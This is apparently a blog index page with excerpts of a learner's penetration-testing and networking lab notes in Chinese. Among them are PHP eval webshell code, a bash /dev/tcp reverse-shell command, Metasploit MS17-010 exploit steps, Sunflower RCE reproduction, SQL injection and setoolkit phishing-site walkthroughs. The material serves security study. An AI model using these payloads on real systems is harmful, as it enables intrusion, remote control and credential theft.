- 博客(42)
- 收藏
- 关注
RSS订阅原创 CSRF及SSRF
CSRF跨站请求伪造构造一个恶意链接或者html页面CSRF漏洞的目的: 目标站点存在一个漏洞(CSRF),攻击者利用此类漏洞伪装了一个链接或者html页面,诱使被攻击者在登录的情况下(即当前cookie有效的情况下)点击了此伪装请求,随后在用户不知情的情况下完成了对当前用户数据的修改或者新增操作,而被修改的信息可能是用户的密码、关键信息又或者新增后台管理员等。SSRF服务器端请求伪造一种由攻击者构造恶意数据,形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法
2022-03-02 20:51:24
3899
原创 向日葵RCE
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的,2. 打开向日葵,连接服务器成功才可以3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip)4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试5. 拿到CID-添加paylo..
2022-03-01 09:33:33
2037
原创 文件包含
1.本地文件包含 分别修改phpinfo.txt扩展名为:jpg、rar、xxx发现均可解析,只要文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。2.远程文件包含文件包含漏洞可以分为LFl (Local File Inclusion本地文件包含)和RFI(Remote File Inclusion,远程文件包含)两种。而区分二者最简单的办法就是通过查看php.ini中是否开启了allow_url_include。如果开启就有可能包含远程文件。远程文件包含需要php....
2022-03-01 09:31:01
1066
原创 基于联合查询的POST注入
1.访问SQLi-Labs网站在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-11。访问的URL为:http://[靶机IP]/sqli-labs/Less-11/2.利用Burpsuite工具抓包(1)启动Burpsuite(2)设置Burpsuite的代理服务端口在Burpsuite 软件界面上选择选项卡"Proxy"->"Options",在 Proxy Listeners模
2022-02-16 20:44:24
3208
原创 数字型,字符型GET注入
1.访问SQLi-Labs网站在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-2。访问的URL为:http://[靶机IP]/sqli-labs/Less-2/登录后,根据网页提示,先给定一个GET参数,即:http://[靶机 IP]/sqli-labs /Less-2 / ?id=1此时页面显示id=1的用户名 Dump、密码 Dump2.寻找注入点分别使用以下3条payload寻找
2022-02-16 20:42:12
1162
原创 SQL注入数据库操作基础
第一部分:Mysql基础操作1.连接数据库成功登录会显示“mysql”的提示符2.显示系统中所有数据库的名称3.新建数据库student新建成功后,show databases; 查询结果4.使用数据库student5.在数据库student中创建表result6.在表中插入数据注意:如果数据是字符型(varchar),必须使用单引号或者双引号包裹插入成功后,如下命令查询表中的全部内容7.在表中删除1条数据删除id=7的数据
2022-02-13 17:59:01
437
原创 C段扫描
1.Nmap扫描2.masscan扫描C段探测 massan -p 80 ip/24 –rate 10000 -oL output.txt-p 设置端口--rate 发包速率-oL 输出位置
2022-01-16 21:28:57
2277
原创 子域名收集
1.子域名爆破下载并赋予执行权限使用工具,-w进行扩展扫描扫描完成,会在同目录生成对应文件,获取子域名结果2.搜索引擎指定语法site: ,搜索子域名,-www表示搜索结果中去掉包含www字符串的结果3.使用theHarvester工具-d 指定域名-g 使用谷歌搜索-s 使用shodan搜索-b 指定某一种或全部搜索使用bing搜索引擎进行搜索使用DNS爆破参数-c...
2022-01-16 21:00:29
2046
原创 DNS信息查询
1.使用who is命令对域名进行查询发现了新的域名,继续查询通过查询出的邮箱,利用站长工具进一步查询又可以发现一些新的域名2.利用nslookup工具进行域名查询查询A类型记录;查询MX类型记录:3.利用dig工具查询各类DNS的解析直接查询域名:指向负责解析的DNS主机查询NS记录:查询TXT记录4.使用DNS子域名爆破工具,针对子域名进行爆破,同时解析出对应的IP地址下载并赋予执行权限使用工具,-w进行
2022-01-16 20:59:13
2265
原创 蚁剑
1.编写一句话木马,并命名为post.php2.利用"蚁剑"连接靶机上的post.php(1)打开中国蚁剑(2)在“中国蚁剑"主界面空白处单击鼠标右键,在弹出的菜单中选择"添加数据"添加一条Webshell管理项3、利用“中国蚁剑"对靶机进行虚拟终端及文件操作(1)虚拟终端操作打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令(2)文件操作、数据操作...
2022-01-16 20:57:50
1286
原创 hashcat与hydra
一.利用漏洞ms17-010获取windows密码hash值1. kali启动metasploit,输入msfconsole2. 利用ms17-010漏洞对靶机进行溢出攻击hashdump获取hash值,复制对user账户的hash密码暴力破解二.利用hydra对靶机FTP登陆密码进行字典攻击的方法1.开启靶机上的FTP服务2.生成密码字典3.使用hydra对靶机FTP登陆密码进行字典攻击...
2022-01-16 20:55:47
1898
原创 burp suite
1.打开Burpsuite工具2.设置代理端口3.打开火狐,手动代理配置4.开启拦截5.访问dvwa,登录不成功拦截到用户名和密码6.点击放行7.页面正常登录
2022-01-13 21:36:17
857
原创 setoolkit
1.启动setoolkit2.构建钓鱼网站(1)选择第一项,社会工程学攻击(2)选择第二项,网站攻击向量(3)选择第三项,凭证收集攻击方法(4)选择第一项,网站模板(5)输入操作机IP,作为钓鱼网站(凭证收集器)的地址(6)选择第二项,建立谷歌网站模板(7)伪装成谷歌的钓鱼网站建立成功(8)填写用户名admin,密码admin监听成功...
2022-01-13 21:16:06
186
原创 firefox插件使用
1.启动Firefox浏览器及hackbar插件2.在浏览器上输入URL,访问SQLi-Labs网站的第一关3.点击Load URL按钮,浏览器地址栏中的URL会被加载到Hackbar的输入栏中4.修改Hackbar中的URL为:http://靶机IP /SQL/Less-1/?id=1然后点击Execute,观察页面5.点击split url ,输入框中的url会按动态参数被切分6. 修改URL,点击execute,勾选port data7.在por
2022-01-13 21:14:58
1323
原创 metesploit工具使用
1.启动Metasploit2. 查找MS17-010(永恒之蓝)相关利用代码3.使用ms17_010_eternalblue模块对目标机进行漏洞检测,以确认目标机存在ms17_010漏洞use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue模块show options //查看该模块需要的参数set RHOSTS 目标IP //设置目标机的IP地址run...
2022-01-13 21:13:47
444
原创 渗透测试环境以及nmap
1.dvwa搭建2.SQL搭建3.namp扫描(1)主机存活检测Nmap -sP 靶机IP扫描主机在线(2)全端口扫描nmap -p T:1-65535,U:1-65535 -sS -sU 目标IP(3)应用程序版本和操作系统检测Nmap -sV -O 目标IP(4)局域网内执行ping扫描Nmap -sP 目标IP段(5)-p 指定扫描的端口号Namp -p T:指定端口 U:指定端口 -sS -sU 目标IP-sS TCP SYN 扫描
2022-01-13 21:12:25
232
原创 IPsec
IPSec(Internet Protocol Security)是IETF(Internet Engineering Task Force)制定的一组开放的网络安全协议。它并不是一个单独的协议,而是一系列为IP网络提供安全性的协议和服务的集合。IPSec用来解决IP层安全性问题的技术。IPSec被设计为同时支持IPv4和IPv6网络。IPSec主要包括安全协议AH(Authentication Header)和ESP(Encapsulating Security Payload),密钥管理交换协议
2021-12-31 09:03:33
1495
原创 通用路由封装协议-GRE
GRE通用路由封装(GRE: Generic Routing Encapsulation)是通用路由封装协议,可以对某些网络层协议的数据报进行封装,使这些被封装的数据报能够在IPv4网络中传输。Tunnel 口收到报文后进行GRE 封装,在封装IP 报文头后,设备根据此IP 包的目的地址及路由表对报文进行转发,从相应的网络接口发送出去。从Tunnel 接口收到IP 报文,检查目的地址。 如果发现目的地是本路由器,则剥掉报文的IP报头,交给GRE 协议处理(进行检验密钥、检查校验和及报文的序列号等
2021-12-30 19:56:56
1469
原创 NAT地址转换
1.配置静态NAT,内部网络的私有IP地址转换为公有IP地址,IP地址对是一对一,实现PC机可以访问Server1AR1:interface GigabitEthernet0/0/0ip address 192.168.1.254 255.255.255.0#interface GigabitEthernet0/0/1ip address 192.168.2.254 255.255.255.0#interface GigabitEthernet0/0/2ip a...
2021-12-24 19:20:43
1379
原创 ACL访问控制实验
ACL访问控制实验实现Client1允许访问web,不允许访问ftpClient2允许访问ftp,不允许访问webLsw1:vlan batch 10 20 30#interface Ethernet0/0/1port link-type accessport default vlan 10#interface Ethernet0/0/2port link-type accessport default vlan 20#interface...
2021-12-24 19:19:28
629
原创 单臂路由
单臂路由Lws1:vlan batch 10 20#interface Ethernet0/0/1port link-type accessport default vlan 10#interface Ethernet0/0/2port link-type accessport default vlan 10#interface Ethernet0/0/3port link-type accessport default vlan 20...
2021-12-23 19:31:35
752
原创 vlan,ospf
1.三层交换机配置VLAN实现相同网段,相同VLAN互相通信不同网段,不同VLAN相互通信LSW1配置如下:vlan batch 10 20#interface Ethernet0/0/1port link-type accessport default vlan 10#interface Ethernet0/0/2port link-type accessport default vlan 20#interface Ethernet0/0...
2021-12-23 16:55:39
1553
原创 静态路由实验
静态路由实验配置IP地址配置PC1到PC2的静态路由配置PC1到PC2的静态路由R1的路由表分析Destination/ mask:目的地址,用来标识IP包的目的地址或者目的网络。网络掩码,与目的地址一起标识目的主机或者路由器所在的网段的地址。Proto: 链路层协议发现的路由(Direct) ,也就是直连路由,手工配置的静态路由(Static)Pre: 标识路由加入IP路由表的优先级。可能到达一个目的地有多条路由,但是优先级的存在让他们先选择优先级高的路
2021-12-22 09:11:56
787
原创 TCP/IP协议栈模型分析
1.标准TCP/IP协议是用于计算机通信的一组协议,通常被称为TCP/IP协议栈,以它为基础组建的互联网是目前国际上规模最大的计算机网络。正因为互联网的广泛应用,使得TCP/IP成为了事实上的网络标准。2.OSI七层模型与TCP/IP协议栈模型对应关系3. 各个层对应协议有哪些?数据链路层HDLC:(High-Level Data Link Control,高级数据链路控制),是链路层协议的一项国际标准,用以实现远程用户间资源共享以及信息交互。STP(Spanning
2021-12-20 20:51:36
953
原创 Windows隐藏账户处置
Windows隐藏账户处置通过注册表实现隐藏账户的建立,可以通过手工来建立隐藏账户一、使用命令行创建用户1、打开命令行2、新建test$用户net user test abc123.. /addnet localgroup administrators test /add二、观察test用户1、使用系统计算机管理工具发现可以看到test用户2、使用命令行查看用户在命令行输入net user无法看到test用户三、导出test和adm
2021-12-15 20:28:11
1380
原创 apache和mariadb安全配置
Apache安全配置一、确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.conf按箭头,下翻可以找到以下配置其中,第一行和第四行,指明了目录,即Linux的根目录 /第二行,表示禁止使用.htaccess文件,覆盖此处配置第三行,表示禁止访问根目录二、删除网站的目录浏览权限apache会在默认路径下开启目录浏览继续查看apache配置文件,如图,其中Indexes即为目录..
2021-12-13 21:03:45
585
原创 centos和windows主机安全配置
Centos安全配置一、网络配置1、检查不用的连接使用以下命令ip link show up如果有需要关闭的接口,可以使用ip link set down2、关闭IP转发先查看ip转发配置sysctl net.ipv4.ip_forward查看发现为0,如果是1,可以使用下面命令改为0sysctl -w net.ipv4.ip_forward=03、关闭数据包重定向查看数据包重定向设置sysctl net.ipv4.conf.all.send_r.
2021-12-13 20:02:10
415
原创 Windows基础
Windows基础Win+r 输入cmd 跳出来dos系统界面Dir 列出所有文件Cd 进入某一个目录Cd .. 返回上一个目录Dir /a 显示出全部目录,包括隐藏文件文件夹有空格,需要双引号没有空格,不需要引号切换到其它盘符D:或者D盘输入cmd,然后回车Md 文件夹名 //创建文件夹dir//显示当前目录中的子文件夹与文件...
2021-12-08 21:03:45
102
原创 liunx系统加固
linux 系统加固账户和口令1 cat /etc/shodow //查看有多少用户2 userdel 用户 //删除无用账户3 passwd -l 用户 //锁定账户4 passwd -u 用户 //解锁账户AWK 解释awk [options] 'pattern + action' filename options :-F: 指明输入时用到的字段分隔...
2021-12-07 20:17:45
174
原创 密钥登录SSH服务器
实验步骤一、生成独立的CA1、 生成ca的key2、生成CA的证书二、生成服务器的私钥key和签名请求文件csr1、生成https服务器私钥2、生成https服务器证书请求文件利用ca的证书和key,生成我们的证书三、安装apache的ssl模块1、服务上已经安装有apache,要实现apache的https功能,需要安装ssl模块四、复制证书到对应路径五、修改apache配置文件,让证书生效六、...
2021-12-06 21:24:54
586
原创 PHP一句话木马
1.get.php<?phpheader("Content-Type: text/html;charset=gb2312");@eval($_GET['cmd']);?>http://127.0.0.1/get.php?cmd=system('whoami');2.post.php<?phpheader("Content-Type: text/html;charset=gb2312");@eval($_POST['cmd']);?>http:/...
2021-12-03 19:21:02
411
原创 PHP进阶
PHP魔术常量PHP 向它运行的任何脚本提供了大量的预定义常量。不过很多常量都是由不同的扩展库定义的,只有在加载了这些扩展库时才会出现,或者动态加载后,或者在编译时已经包括进去了。__LINE__文件中的当前行号。__FILE__文件的完整路径和文件名。如果用在被包含文件中,则返回被包含的文件名。__DIR__文件所在的目录。如果用在被包括文件中,则返回被包括的文件所在的目录。__FUNCTION__函数名称。__CLASS__类的名称。类名包括其被声明的作.
2021-12-02 20:57:46
458
原创 PHP
PHP数据类型String(字符串), Integer(整型), Float(浮点型), Boolean(布尔型), Array(数组), Object(对象), NULL(空值)。字符串一个字符串是一串字符的序列,就像 "Hello world!"。你可以将任何文本放在单引号和双引号中:整型整数是一个没有小数的数字。整数规则:整数必须至少有一个数字 (0-9) 整数不能包含逗号或空格 整数是没有小数点的 整数可以是正数或负数 整型可以用三种格式来指定:十进
2021-12-01 20:44:40
413
原创 JavaScript 、PHP
1. JavaScript<!DOCTYPE HTML><html> <head> <meta charset="utf-8" /> <script> // HTML 页面中插入 JavaScript,使用 <script> 标签。 function myjs() //定义一个函数...
2021-11-30 20:39:39
561
原创 HTML
ASCLLASCII 字符集被用于因特网上不同计算机间传输信息。ASCII 字符集ASCII ,它的全称是"美国信息交换标准代码"。它设计于60年代早期,是计算机和诸如打印机、磁带驱动器之类的硬件设备的标准字符集。ASCII 是 7 比特字符集,包含了 128 个不同的字符值。ASCII 支持 0-9 的数字,A-Z大写和小写英文字母,以及一些特殊字符。被广泛使用于现代计算机、HTML和因特网上的字符集都是基于 ASCII 。GBKGBK(Chinese Internal C
2021-11-29 22:05:42
1410
原创 linux压缩与权限以及tumx
Tmux是一个优秀的终端复用软件,类似GNU Screen,但来自于OpenBSD,采用BSD授权。使用它最直观的好处就是,通过一个终端登录远程主机并运行tmux后,在其中可以开启多个控制台而无需再“浪费”多余的终端来连接这台远程主机。是BSD实现的Screen替代品,相对于Screen,它更加先进:支持屏幕切分,而且具备丰富的命令行参数,使其可以灵活、动态的进行各种布局和操作。tmux 常用操作命令:tmux new -s session1 新建会话ctrl+b d 退出会话,
2021-11-27 20:44:37
536
原创 反弹shell和云服务器
一.反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。nc -lvvp port //kali上执行这条命令 //port 为攻击主机端口号,并且此端口号没有被占用bash -i >& /dev/tcp/攻击主机ip/port 0>&1 /...
2021-11-27 09:18:30
281
原创 Liunx命令
一. Grep1.grep 命令用于查找文件里符合的字符串grep 选项 需要捕获的文字 目标文件例: 从 /etc/passwd 中查找root相关的用户信息Grep root /etc/passwd-A:显示捕获行之后行数-B:显示捕获行之前的行数-C:显示捕获行前后的行数-c:显示符合条件的行数-i:忽略大小写-n:输出符合条件文件所在行号-v:不包含关键字的行查找可以登录的用户二. Sed1. sed [-hnv] [-e&..
2021-11-26 09:00:51
51
原创 Liunx命令
基本命令1、df指令作用:查看磁盘的空间语法:#df -h -h表示以可读性较高的形式展示大小2、free指令作用:查看内存使用情况语法:#free -m -m表示以MB为单位查看3、wc指令作用:统计文件内容信息(包含行数、单词数、字节数)语法:#wc -lwc 需要统计的文件路径 -l:表示lines,行数 -w:表示words,单词数 依照空格来判断单词数量 -c:表示bytes,字节数...
2021-11-25 10:51:41
746
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人